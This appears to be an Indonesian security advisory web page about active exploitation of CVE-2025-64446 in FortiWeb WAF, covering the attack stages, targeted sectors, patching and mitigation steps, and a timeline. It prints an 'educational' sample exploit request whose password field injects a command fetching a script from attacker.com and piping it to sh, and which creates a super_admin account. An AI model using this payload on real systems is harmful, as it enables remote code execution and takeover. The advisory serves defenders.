Serangan eksploitasi aktif terhadap kerentanan kritis CVE-2025-64446 pada FortiWeb WAF telah terdeteksi di seluruh dunia. Ancaman ini memungkinkan penyerang untuk mengeksekusi kode berbahaya secara remote tanpa autentikasi. Tindakan segera diperlukan untuk semua pengguna FortiWeb!
Pada tanggal 17 November 2025, tim keamanan global mendeteksi gelombang serangan eksploitasi aktif yang menargetkan kerentanan kritis pada Fortinet FortiWeb Web Application Firewall (WAF). Kerentanan yang diberi identitas CVE-2025-64446 ini memiliki skor CVSS 9.8 (Critical) dan memungkinkan penyerang untuk melakukan Remote Code Execution (RCE) tanpa memerlukan autentikasi.
Eksploitasi aktif sedang berlangsung dengan tingkat kecanggihan tinggi. Sistem yang tidak di-patch berisiko tinggi mengalami kompromi total.
CVE-2025-64446
9.8 / 10
Remote Code Execution (RCE)
Tidak Diperlukan
Kerentanan ini berada pada komponen management interface FortiWeb WAF, khususnya pada modul pemrosesan permintaan HTTP. Penyerang dapat mengirimkan payload yang dirancang khusus untuk memicu eksekusi kode arbitrer dengan hak akses sistem yang tinggi.
Web Application Firewall
Sistem Terdeteksi Rentan
Negara Terdampak
Serangan Terdeteksi
Kelompok APT Terlibat
Penyerang melakukan scanning massal terhadap sistem FortiWeb yang terekspos di internet menggunakan tools otomatis seperti Shodan, Censys, dan scanner custom untuk mengidentifikasi target yang rentan.
Mengirimkan HTTP request yang telah dimanipulasi ke management interface FortiWeb untuk memicu buffer overflow atau injection vulnerability yang memungkinkan eksekusi kode remote.
Setelah mendapatkan akses awal, penyerang men-deploy malware, backdoor, atau webshell untuk mempertahankan akses persisten ke sistem yang telah dikompromi.
Dari sistem FortiWeb yang dikompromikan, penyerang melakukan pivot ke jaringan internal, mencuri kredensial, dan mengakses sistem-sistem kritis lainnya dalam infrastruktur korban.
Tahap akhir melibatkan pencurian data sensitif, deploy ransomware, atau melakukan sabotase terhadap sistem-sistem critical business operations.
Target utama untuk pencurian data finansial dan kredensial akses sistem perbankan.
Rumah sakit dan provider layanan kesehatan menjadi target untuk ransomware dan pencurian data pasien.
Lembaga pemerintah menjadi sasaran untuk spionase siber dan pencurian data rahasia negara.
Platform e-commerce ditargetkan untuk pencurian data kartu kredit dan informasi pelanggan.
Berdasarkan data threat intelligence terbaru, Indonesia termasuk dalam 5 besar negara dengan jumlah sistem FortiWeb rentan tertinggi. Lebih dari 850 sistem teridentifikasi masih menggunakan versi yang belum di-patch, dengan konsentrasi tertinggi di sektor:
Ikuti langkah-langkah berikut dalam urutan prioritas
Login ke management interface dan cek versi yang sedang berjalan. Bandingkan dengan daftar versi rentan di atas.
System → Status → System Information
Download dan install security patch dari Fortinet Customer Service & Support portal:
Jika patching memerlukan waktu, segera implementasikan kontrol akses sementara:
Periksa log sistem untuk indikasi kompromi:
Deploy detection rules untuk mendeteksi upaya eksploitasi CVE-2025-64446. Fortinet telah merilis signature update untuk FortiGate IPS.
Tim security expert kami siap membantu Anda melakukan patching dan incident response.
Hubungi Emergency ResponseJika Anda menemukan indikasi bahwa sistem FortiWeb Anda telah dikompromi:
Kerentanan CVE-2025-64446 disebabkan oleh insufficient input validation pada komponen HTTP request handler di management interface FortiWeb. Secara spesifik, vulnerability terletak pada:
/api/v2/cmdb/system/admin
Management API endpoint yang tidak melakukan proper sanitization terhadap user-supplied input.
Panjang string tidak divalidasi dengan benar, memungkinkan attacker untuk overflow buffer dan overwrite return address.
Special characters dalam parameter tidak di-escape, memungkinkan injection of shell commands.
Kombinasi dengan logic flaw memungkinkan bypass authentication mechanism pada certain endpoints.
/api/v2/cmdb/system/admin
Berikut adalah contoh simplified payload yang digunakan untuk mengeksploitasi vulnerability ini (untuk educational purposes only):
POST /api/v2/cmdb/system/admin HTTP/1.1
Host: target-fortiweb.example.com
Content-Type: application/json
Content-Length: 256
{
"name": "admin' OR '1'='1",
"password": "$(curl http://attacker.com/payload.sh | sh)",
"trusthost": "0.0.0.0/0",
"accprofile": "super_admin"
}
Disclaimer: Contoh ini hanya untuk tujuan edukasi. Menggunakan exploit ini tanpa authorization adalah illegal dan dapat dikenakan sanksi hukum.
Security researcher menemukan vulnerability dan melaporkan ke Fortinet melalui responsible disclosure program.
Fortinet mengkonfirmasi vulnerability dan mulai develop security patch untuk semua affected versions.
Fortinet merilis security patches dan advisory PSIRT-24-1147 untuk CVE-2025-64446.
Threat intelligence teams mendeteksi active exploitation di wild. Serangan massal dimulai terhadap unpatched systems worldwide.
Tim security experts KresID siap membantu organisasi Anda dalam melakukan patching, vulnerability assessment, dan incident response untuk CVE-2025-64446.
Halaman ini akan diupdate secara berkala dengan informasi terbaru
CISA Menambahkan CVE-2025-64446 ke KEV Catalog
US CISA telah menambahkan vulnerability ini ke daftar Known Exploited Vulnerabilities dengan deadline patching 27 November 2025 untuk federal agencies.
Peningkatan Intensitas Serangan di Asia Pasifik
Threat intelligence menunjukkan lonjakan 300% dalam upaya exploitation di region Asia Pasifik dalam 6 jam terakhir, dengan Indonesia menjadi salah satu target utama.
Fortinet Merilis IPS Signature Update
Fortinet telah merilis updated IPS signatures (DB version 24.547) untuk FortiGate yang dapat mendeteksi dan memblokir exploitation attempts terhadap CVE-2025-64446.
Data berdasarkan telemetry dari security vendors dan honeypot networks
Bantu sebarkan awareness tentang ancaman keamanan kritis ini ke rekan dan organisasi Anda
Dapatkan notifikasi real-time tentang threat intelligence, security advisories, dan vulnerability updates langsung ke email Anda.
Kami menghormati privasi Anda. Unsubscribe kapan saja.